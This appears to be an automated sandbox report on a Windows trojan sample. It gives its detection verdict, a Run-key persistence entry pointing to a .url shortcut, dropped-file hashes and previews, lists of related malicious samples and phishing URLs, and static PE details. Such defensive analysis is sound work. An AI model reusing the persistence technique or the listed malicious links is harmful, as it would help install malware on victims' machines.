Number of analysed new started processes analysed:	18
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@10/5@2/2
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 99.8% (good quality ratio 86.8%) Quality average: 74.2% Quality standard deviation: 34.1%
HCA Information:	Successful, ratio: 100% Number of executed functions: 39 Number of non-executed functions: 163
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): www.bing.com, odc-web-brs.onedrive.akadns.net, odwebpl.trafficmanager.net.l-0004.dc-msedge.net.l-0004.l-msedge.net, fs.microsoft.com, ocsp.digicert.com, odc-web-geo.onedrive.akadns.net, ph-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, ctldl.windowsupdate.com, odc-ph-files-geo.onedrive.akadns.net, odc-ph-files-brs.onedrive.akadns.net
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
10:41:50	API Interceptor	1x Sleep call for process: SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe modified
10:41:55	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Iuigzwjd C:\Users\Public\Libraries\djwzgiuI.url
10:42:04	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Iuigzwjd C:\Users\Public\Libraries\djwzgiuI.url
10:42:10	API Interceptor	2x Sleep call for process: Iuigzwjd.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
13.107.43.12	000211232334_33455INVOICE .vbs	Get hash	malicious	Browse
	IMG_2022112022-6468.vbs	Get hash	malicious	Browse
	SecuriteInfo.com.Win32.Malware-gen.5701.3804.exe	Get hash	malicious	Browse
	Swift Payment Copy .xla.exe	Get hash	malicious	Browse
	03231262773662516627.exe	Get hash	malicious	Browse
	Cogigqkbkuvzlh.exe	Get hash	malicious	Browse
	Inquiry For RE UGS - LCL - INDONESIA.exe	Get hash	malicious	Browse
	AZ032441352671726.exe	Get hash	malicious	Browse
	CONFD-31 PROPOSED VILLA (B+G+1+PH) + MAJLIS .exe	Get hash	malicious	Browse
	Requisition Order.exe	Get hash	malicious	Browse
	Delivery report.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Win32.Evo-gen.7732.16870.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Tedy.237947.19482.16084.exe	Get hash	malicious	Browse
	Huat Tradings - Products Inquiry.exe	Get hash	malicious	Browse
	Products Inquiry_Document.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Ransom.Gendarmerie.22.23590.8978.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Win32.PWSX-gen.19083.21703.exe	Get hash	malicious	Browse
	Invoice Overdue & Error INV NR 522236562 DTD 25.10.2021 SK.exe	Get hash	malicious	Browse
	PRODUCTS LIST & DESIGN.exe	Get hash	malicious	Browse
	1pC25llyp3.exe	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
l-0004.l-dc-msedge.net	https://1drv.ms/u/s!ArRALBXIbfgUd8Spn1K8LTd4yAA?e=7gzZ0W	Get hash	malicious	Browse	13.107.43.13
	045624132441524.exe	Get hash	malicious	Browse	13.107.43.13
	Ordine acquisto(P.O6203445-2022)RePack.exe	Get hash	malicious	Browse	13.107.43.13
	https://1drv.ms/o/s!BLY0hv4xqIpbmARXnxSVd4QkwxWa?e=tD8uX-zFBEKb-K9w5IcbrA&at=9	Get hash	malicious	Browse	13.107.43.13
	Swift Payment Copy .xla.exe	Get hash	malicious	Browse	13.107.43.13
	Swift Payment Copy .xla.exe	Get hash	malicious	Browse	13.107.43.13
	INV CI915998.vbs	Get hash	malicious	Browse	13.107.43.13
	Inquiry For RE UGS - LCL - INDONESIA.exe	Get hash	malicious	Browse	13.107.43.13
	AZ032441352671726.exe	Get hash	malicious	Browse	13.107.43.13
	CONFD-31 PROPOSED VILLA (B+G+1+PH) + MAJLIS .exe	Get hash	malicious	Browse	13.107.43.13
	PRODUCTS_PROFILE.exe	Get hash	malicious	Browse	13.107.43.13
	https://1drv.ms/o/s!BHUQRpBzaor7gaNIUmTAGqlwHeFl6Q?e=wGwClAol2kuBUl1CN_xM3A&at=9	Get hash	malicious	Browse	13.107.43.13
	Inquiry_List.exe	Get hash	malicious	Browse	13.107.43.13
	SecuriteInfo.com.Variant.Tedy.237947.19482.16084.exe	Get hash	malicious	Browse	13.107.43.13
	Huat Tradings - Products Inquiry.exe	Get hash	malicious	Browse	13.107.43.13
	SecuriteInfo.com.Trojan.GenericKD.63549878.9621.12168.exe	Get hash	malicious	Browse	13.107.43.13
	Products Inquiry_Document.exe	Get hash	malicious	Browse	13.107.43.13
	https://1drv.ms/o/s!BBc55xLVu6BBrHk8Y3FAwf9fJzZb?e=ycKJMSZa3kWeLk1oGih-8w&at=9	Get hash	malicious	Browse	13.107.43.13
	https://1drv.ms/o/s!BBc55xLVu6BBrHk8Y3FAwf9fJzZb?e=ycKJMSZa3kWeLk1oGih-8w&at=9	Get hash	malicious	Browse	13.107.43.13
	SecuriteInfo.com.Variant.Ransom.Gendarmerie.22.23590.8978.exe	Get hash	malicious	Browse	13.107.43.13
l-0003.l-dc-msedge.net	000211232334_33455INVOICE .vbs	Get hash	malicious	Browse	13.107.43.12
	IMG_2022112022-6468.vbs	Get hash	malicious	Browse	13.107.43.12
	SecuriteInfo.com.Win32.Malware-gen.5701.3804.exe	Get hash	malicious	Browse	13.107.43.12
	Swift Payment Copy .xla.exe	Get hash	malicious	Browse	13.107.43.12
	03231262773662516627.exe	Get hash	malicious	Browse	13.107.43.12
	Cogigqkbkuvzlh.exe	Get hash	malicious	Browse	13.107.43.12
	Inquiry For RE UGS - LCL - INDONESIA.exe	Get hash	malicious	Browse	13.107.43.12
	AZ032441352671726.exe	Get hash	malicious	Browse	13.107.43.12
	CONFD-31 PROPOSED VILLA (B+G+1+PH) + MAJLIS .exe	Get hash	malicious	Browse	13.107.43.12
	Requisition Order.exe	Get hash	malicious	Browse	13.107.43.12
	PRODUCTS_PROFILE.exe	Get hash	malicious	Browse	13.107.43.12
	Delivery report.exe	Get hash	malicious	Browse	13.107.43.12
	SecuriteInfo.com.Win32.Evo-gen.7732.16870.exe	Get hash	malicious	Browse	13.107.43.12
	SecuriteInfo.com.Variant.Tedy.237947.19482.16084.exe	Get hash	malicious	Browse	13.107.43.12
	Huat Tradings - Products Inquiry.exe	Get hash	malicious	Browse	13.107.43.12
	Products Inquiry_Document.exe	Get hash	malicious	Browse	13.107.43.12
	SecuriteInfo.com.Variant.Ransom.Gendarmerie.22.23590.8978.exe	Get hash	malicious	Browse	13.107.43.12
	SecuriteInfo.com.Win32.PWSX-gen.19083.21703.exe	Get hash	malicious	Browse	13.107.43.12
	Invoice Overdue & Error INV NR 522236562 DTD 25.10.2021 SK.exe	Get hash	malicious	Browse	13.107.43.12
	PRODUCTS LIST & DESIGN.exe	Get hash	malicious	Browse	13.107.43.12

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
MICROSOFT-CORP-MSN-AS-BLOCKUS	http://4xn.se4.hidroage.com/#.aHR0cHM6Ly9zdG9yYWdlYXBpLmZsZWVrLmNvLzIyMTBjMGMxLTFkZjktNGRkYi1hNzA5LTM2OGVmZTliNjk0My1idWNrZXQvUEFHRSBORVcuaHRtbCNhbnRvbi5sb3V3aW5nZXJAY21zLWRzYi5jb20=	Get hash	malicious	Browse	13.107.219.60
	taxonomy.dll.dll	Get hash	malicious	Browse	104.147.217.172
	policy handbooks.html	Get hash	malicious	Browse	13.107.246.45
	Judy Katro shared QHA AUSTRALIA with you..msg	Get hash	malicious	Browse	20.44.10.122
	https://sites.google.com/view/uas-invite/home	Get hash	malicious	Browse	104.208.16.88
	darden.com .html	Get hash	malicious	Browse	13.107.213.45
	f03XBkpBK6.elf	Get hash	malicious	Browse	40.83.2.247
	darden.com .html	Get hash	malicious	Browse	13.107.246.60
	GyKpRhKQY1.elf	Get hash	malicious	Browse	20.136.162.153
	kTK22xqEq6.elf	Get hash	malicious	Browse	20.113.208.149
	7HuJu44thW.elf	Get hash	malicious	Browse	155.62.129.9
	https://app.smartsheet.com/b/download/att/1/7953430800033668/2d1kcfy3a3mgsxdrbomrc9v3jo	Get hash	malicious	Browse	13.107.246.60
	https://ipfs.fleek.co/ipfs/bafybeic3q6fuhi5kyycepznhhccvbdkt36zuhk6qn4hh2vwyqpoa2r3kqa#nbbebenefits@crystalco.com	Get hash	malicious	Browse	51.143.106.130
	Check#33743_pymntCopy_pdf.htm	Get hash	malicious	Browse	13.107.219.60
	https://firerite1-my.sharepoint.com/:o:/g/personal/luke_firerite_co_uk/EgX55biPFdZEjA-OHgYPtTQBt8i3-MO-Jg7Sa3pYTRp-_Q?e=5%3aStgzAn&at=9	Get hash	malicious	Browse	13.107.6.171
	ATT00001.htm	Get hash	malicious	Browse	13.107.246.45
	#U266b Audio-1410.wavv-Copy.hTm	Get hash	malicious	Browse	13.107.213.45
	https://hotelsmag.com/news	Get hash	malicious	Browse	204.79.197.200
	file.exe	Get hash	malicious	Browse	20.42.73.29
	Revised Policy Benefits.html	Get hash	malicious	Browse	13.107.246.60
MICROSOFT-CORP-MSN-AS-BLOCKUS	http://4xn.se4.hidroage.com/#.aHR0cHM6Ly9zdG9yYWdlYXBpLmZsZWVrLmNvLzIyMTBjMGMxLTFkZjktNGRkYi1hNzA5LTM2OGVmZTliNjk0My1idWNrZXQvUEFHRSBORVcuaHRtbCNhbnRvbi5sb3V3aW5nZXJAY21zLWRzYi5jb20=	Get hash	malicious	Browse	13.107.219.60
	taxonomy.dll.dll	Get hash	malicious	Browse	104.147.217.172
	policy handbooks.html	Get hash	malicious	Browse	13.107.246.45
	Judy Katro shared QHA AUSTRALIA with you..msg	Get hash	malicious	Browse	20.44.10.122
	https://sites.google.com/view/uas-invite/home	Get hash	malicious	Browse	104.208.16.88
	darden.com .html	Get hash	malicious	Browse	13.107.213.45
	f03XBkpBK6.elf	Get hash	malicious	Browse	40.83.2.247
	darden.com .html	Get hash	malicious	Browse	13.107.246.60
	GyKpRhKQY1.elf	Get hash	malicious	Browse	20.136.162.153
	kTK22xqEq6.elf	Get hash	malicious	Browse	20.113.208.149
	7HuJu44thW.elf	Get hash	malicious	Browse	155.62.129.9
	https://app.smartsheet.com/b/download/att/1/7953430800033668/2d1kcfy3a3mgsxdrbomrc9v3jo	Get hash	malicious	Browse	13.107.246.60
	https://ipfs.fleek.co/ipfs/bafybeic3q6fuhi5kyycepznhhccvbdkt36zuhk6qn4hh2vwyqpoa2r3kqa#nbbebenefits@crystalco.com	Get hash	malicious	Browse	51.143.106.130
	Check#33743_pymntCopy_pdf.htm	Get hash	malicious	Browse	13.107.219.60
	https://firerite1-my.sharepoint.com/:o:/g/personal/luke_firerite_co_uk/EgX55biPFdZEjA-OHgYPtTQBt8i3-MO-Jg7Sa3pYTRp-_Q?e=5%3aStgzAn&at=9	Get hash	malicious	Browse	13.107.6.171
	ATT00001.htm	Get hash	malicious	Browse	13.107.246.45
	#U266b Audio-1410.wavv-Copy.hTm	Get hash	malicious	Browse	13.107.213.45
	https://hotelsmag.com/news	Get hash	malicious	Browse	204.79.197.200
	file.exe	Get hash	malicious	Browse	20.42.73.29
	Revised Policy Benefits.html	Get hash	malicious	Browse	13.107.246.60

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
37f463bf4616ecd445d4a1937da06e19	D009780.exe	Get hash	malicious	Browse	13.107.43.12 13.107.43.13
	E-DEKONT.exe	Get hash	malicious	Browse	13.107.43.12 13.107.43.13
	https://sites.google.com/view/hfcx/accueil	Get hash	malicious	Browse	13.107.43.12 13.107.43.13
	policy handbooks.html	Get hash	malicious	Browse	13.107.43.12 13.107.43.13
	synapse3.zip	Get hash	malicious	Browse	13.107.43.12 13.107.43.13
	http://ideentiifire.com	Get hash	malicious	Browse	13.107.43.12 13.107.43.13
	00000000.exe	Get hash	malicious	Browse	13.107.43.12 13.107.43.13
	ErwCX0jnl8.exe	Get hash	malicious	Browse	13.107.43.12 13.107.43.13
	darden.com .html	Get hash	malicious	Browse	13.107.43.12 13.107.43.13
	https://paper.li/lnMHi8ZFENoxtKejQDZMh/story/document-confidential-m8ZkThqLiTXweW3JUxcg2	Get hash	malicious	Browse	13.107.43.12 13.107.43.13
	https://app.smartsheet.com/b/download/att/1/7953430800033668/2d1kcfy3a3mgsxdrbomrc9v3jo	Get hash	malicious	Browse	13.107.43.12 13.107.43.13
	Message.html	Get hash	malicious	Browse	13.107.43.12 13.107.43.13
	https://ipfs.fleek.co/ipfs/bafybeic3q6fuhi5kyycepznhhccvbdkt36zuhk6qn4hh2vwyqpoa2r3kqa#nbbebenefits@crystalco.com	Get hash	malicious	Browse	13.107.43.12 13.107.43.13
	abutmentAnemone.jpg.dll	Get hash	malicious	Browse	13.107.43.12 13.107.43.13
	Check#33743_pymntCopy_pdf.htm	Get hash	malicious	Browse	13.107.43.12 13.107.43.13
	https://u29751933.ct.sendgrid.net/ls/click?upn=CnGGOnFaxhvhWvH4Fu0DshuMMwznLhhSl0vF9VJfmXn4k3uWmXtWEXgU1gN1sOYDM-2FnTKBAYRDOo-2Fxp1e29eFw-3D-3D1SY9_-2FHydVa-2F6RgJ-2BO01uO1tSzf4k9wftL50WVzxI-2BDuM83WY91mlfH2j-2BdduOmIaC9RL57-2F4cZ8bwv5R6qDViDOPW8H7XI4v762lTVPjiQ2n2fiTT0EsPoTwZUC1VOPK6BOuruRTtU-2FIclxgJ3qp4zIBngkcg1uQEKF68oozcL-2BfK4GoB5e-2BnOh4XhI8nLZlju2lQTsa8dPRVDT7dRrjRlibaPNNXjuJ6PKaJjbMu-2Bzfm-2F8-3D	Get hash	malicious	Browse	13.107.43.12 13.107.43.13
	https://linkprotect.cudasvc.com/url?a=https%3a%2f%2flnewmanbunnellelectric.com%2f&c=E,1,-SmOrItRkzmIjK3rKUS4lI02RvsfWzGdZ1HnCIT5Pt230osjD6mDrVCNiu4teQwo-lwx2RA8Bs1QUO7XeVgh7bu1527soTNm0HME39Y1hPc-NQmLQw,,&typo=1	Get hash	malicious	Browse	13.107.43.12 13.107.43.13
	http://www.fpat.info	Get hash	malicious	Browse	13.107.43.12 13.107.43.13
	https://mailsrver.contributes.rest/databases.html?home=sculver@glenergy.com	Get hash	malicious	Browse	13.107.43.12 13.107.43.13
	45FRI 36545.htm	Get hash	malicious	Browse	13.107.43.12 13.107.43.13

Dropped Files

⊘No context

Created / dropped Files

C:\Users\Public\Libraries\Iuigzwjd

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe
File Type:	data
Category:	dropped
Size (bytes):	189869
Entropy (8bit):	7.993154525475343
Encrypted:	true
SSDEEP:	3072:JB2ruI114IXlkeukze3mxOVeFRTe8a+opBUMkNtSx1WOUzM80SAjWsNhX5deg/+V:JB2rRxuZmxOVuTe8lozUMWtS2grfx+V
MD5:	7AC99DA57C0EE5DEC172741B47903FA4
SHA1:	90BD8551DD694D2AB0A857731735761F25D6FD29
SHA-256:	867D6D0F50C2C377B44B4988A55C484C29CAFE4306032F72809C749178E05F7A
SHA-512:	0AD7A7B6FF56F9F2AAF3DCAAD013D22D5A4D592DFD2B01D5419CDECA49BE8F4C7433ABB5948C22E92181A37CF74E372A1287E2092C09AD93EEB832B2CA8AA8BF
Malicious:	false
Reputation:	low
Preview:	....4.e.4..kk.4........kk.4.......4..o..}..}..yq..uo..o..o.swos...m.q..us...q.s.....w.......4.e.4..kk.4........kk.4.......4..us.....{m....4.e.4..kk.4........kk.4.......47)..9.....%...7...9.'........-..7.9...77'...'.)1./.97)..9.....%...7...9.'........-..7.9...77'...'.)1./.97)..9.....%...7...9.'........-..7.9...77'...'.)1./.97)..9.....%...7...9.'........-..7.9...77'...'.)1./.97)..9.....%...7...9.'........-..7.9...77'...'.)1./.97)..9.....%...7...9.'........-..7.9...77'...'.)1./.97)..9.....%...7...9.'........-..7.9...77'...'.)1./.97)..9.....%...7...9.'........-..7.9...77'...'.)1./.97)..9.....%...7...9.'........-..7.9...77'...'.)1./.97)..9.....%...7...9.'........-..7.9...77'...'.)1./.97)..9.....%...7...9.'........-..7.9...77'...'.)1./.97)..9.....%...7...9.'........-..7.9...77'...'.)1./.97)..9.....%...7...9.'........-..7.9...77'...'.)1./.97)..9.....%...7...9.'.....Y.^..._....j...0..-.2sW..(TD..M>."....6)y.s.Tl...#....K3-.h.....(.H.....(....'zI...hS(.#&n......C".`..O..TG

C:\Users\Public\Libraries\Iuigzwjd.exe

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	750592
Entropy (8bit):	6.871648147377771
Encrypted:	false
SSDEEP:	12288:i1qMhtVLzLypCggIh36+O9dvjpQVeri442qKk/RqIkr:WFhHzmQgn6+8T/r7PaqI
MD5:	F536EA8FB5B6586BB2FFC764CD52ABFF
SHA1:	313804060F2511B8382D369A3949D5524C1ADAEF
SHA-256:	E539F80082F961C600E6FF2A21E969D0641AA787831259D3FDD772B28D469721
SHA-512:	873E0A7174BE40DB35F8E8F06FD7FFAF340128E7EE6EC09F691CA8857AAC9B1F4C5D6CDB76841858EF4E52B2FA5A4A9A18588221567626FE1474B8B101CEF8EA
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 15%
Reputation:	low
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................b.......&.......0....@..............................................@........................... ...%.......$...................p...n...........................`......................$'...............................text...,........................... ..`.itext..$.... ...................... ..`.data........0......................@....bss....`6...............................idata...%... ...&..................@....tls....4....P...........................rdata.......`......................@..@.reloc...n...p...p..................@..B.rsrc....$.......$...N..............@..@.....................r..............@..@................................................................................................

C:\Users\Public\Libraries\Iuigzwjd.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\Public\Libraries\djwzgiuI.url

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe
File Type:	MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Iuigzwjd.exe">), ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	100
Entropy (8bit):	5.05252935030364
Encrypted:	false
SSDEEP:	3:HRAbABGQYmTWAX+rSF55i0XMVKSsGKd6dbP6v:HRYFVmTWDyz/SsbMPE
MD5:	94A7CAD400BB0ED39AE61258D1388317
SHA1:	E3F698F5EAA841B12F2077F1884F1719CF6BADF0
SHA-256:	89A9D4CDBC1953F6092CF9A15E8AEB63E599B5600345E2297E075C95CE2DC0AC
SHA-512:	ECF712A5F03DE0D19D8B83E11A579B5C5056548F08C15BD79F8DCBA6E671AF0C0B3C0AF60D97038D98D316774277DFD28223CF2EF188EC1F58BEC53EBB093DE3
Malicious:	false
Yara Hits:	Rule: Methodology_Shortcut_HotKey, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\Public\Libraries\djwzgiuI.url, Author: @itsreallynick (Nick Carr) Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\Public\Libraries\djwzgiuI.url, Author: @itsreallynick (Nick Carr)
Preview:	[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Iuigzwjd.exe"..IconIndex=28..HotKey=79..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\Iuigzwjduoa[1]

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe
File Type:	data
Category:	dropped
Size (bytes):	189869
Entropy (8bit):	7.993154525475343
Encrypted:	true
SSDEEP:	3072:JB2ruI114IXlkeukze3mxOVeFRTe8a+opBUMkNtSx1WOUzM80SAjWsNhX5deg/+V:JB2rRxuZmxOVuTe8lozUMWtS2grfx+V
MD5:	7AC99DA57C0EE5DEC172741B47903FA4
SHA1:	90BD8551DD694D2AB0A857731735761F25D6FD29
SHA-256:	867D6D0F50C2C377B44B4988A55C484C29CAFE4306032F72809C749178E05F7A
SHA-512:	0AD7A7B6FF56F9F2AAF3DCAAD013D22D5A4D592DFD2B01D5419CDECA49BE8F4C7433ABB5948C22E92181A37CF74E372A1287E2092C09AD93EEB832B2CA8AA8BF
Malicious:	false
Preview:	....4.e.4..kk.4........kk.4.......4..o..}..}..yq..uo..o..o.swos...m.q..us...q.s.....w.......4.e.4..kk.4........kk.4.......4..us.....{m....4.e.4..kk.4........kk.4.......47)..9.....%...7...9.'........-..7.9...77'...'.)1./.97)..9.....%...7...9.'........-..7.9...77'...'.)1./.97)..9.....%...7...9.'........-..7.9...77'...'.)1./.97)..9.....%...7...9.'........-..7.9...77'...'.)1./.97)..9.....%...7...9.'........-..7.9...77'...'.)1./.97)..9.....%...7...9.'........-..7.9...77'...'.)1./.97)..9.....%...7...9.'........-..7.9...77'...'.)1./.97)..9.....%...7...9.'........-..7.9...77'...'.)1./.97)..9.....%...7...9.'........-..7.9...77'...'.)1./.97)..9.....%...7...9.'........-..7.9...77'...'.)1./.97)..9.....%...7...9.'........-..7.9...77'...'.)1./.97)..9.....%...7...9.'........-..7.9...77'...'.)1./.97)..9.....%...7...9.'........-..7.9...77'...'.)1./.97)..9.....%...7...9.'.....Y.^..._....j...0..-.2sW..(TD..M>."....6)y.s.Tl...#....K3-.h.....(.H.....(....'zI...hS(.#&n......C".`..O..TG

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.871648147377771
TrID:	Win32 Executable (generic) a (10002005/4) 99.38% InstallShield setup (43055/19) 0.43% Windows Screen Saver (13104/52) 0.13% Win16/32 Executable Delphi generic (2074/23) 0.02% Generic Win/DOS Executable (2004/3) 0.02%
File name:	SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe
File size:	750592
MD5:	f536ea8fb5b6586bb2ffc764cd52abff
SHA1:	313804060f2511b8382d369a3949d5524c1adaef
SHA256:	e539f80082f961c600e6ff2a21e969d0641aa787831259d3fdd772b28d469721
SHA512:	873e0a7174be40db35f8e8f06fd7ffaf340128e7ee6ec09f691ca8857aac9b1f4c5d6cdb76841858ef4e52b2fa5a4a9a18588221567626fe1474b8b101cef8ea
SSDEEP:	12288:i1qMhtVLzLypCggIh36+O9dvjpQVeri442qKk/RqIkr:WFhHzmQgn6+8T/r7PaqI
TLSH:	FFF47E6761D04537D02716398C1BA7A8596F7EE03F14BC6667E03DCC9F382CA74292AB
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	2321270727090923

Static PE Info

General

Entrypoint:	0x4626e8
Entrypoint Section:	.itext
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
DLL Characteristics:
Time Stamp:	0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	5a047051636dce23e36a7dceaf1507c0

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
add esp, FFFFFFF0h
mov eax, 0046105Ch
call 00007F450101B915h
mov ecx, dword ptr [0046D410h]
mov eax, dword ptr [0046D324h]
mov eax, dword ptr [eax]
mov edx, dword ptr [00460A90h]
call 00007F450106E2EDh
mov eax, dword ptr [0046D324h]
mov eax, dword ptr [eax]
call 00007F450106E361h
call 00007F4501019A18h
lea eax, dword ptr [eax+00h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x72000	0x25ac	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x7e000	0x42400	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x77000	0x6eec	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x76000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x72724	0x5e4	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6022c	0x60400	False	0.5191025771103897	data	6.531038724700122	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext	0x62000	0x724	0x800	False	0.57373046875	data	5.847823102407548	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x63000	0xa49c	0xa600	False	0.08546686746987951	data	6.483179375342552	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss	0x6e000	0x3660	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x72000	0x25ac	0x2600	False	0.32452713815789475	data	5.139331879404015	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x75000	0x34	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x76000	0x18	0x200	False	0.05078125	data	0.2108262677871819	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
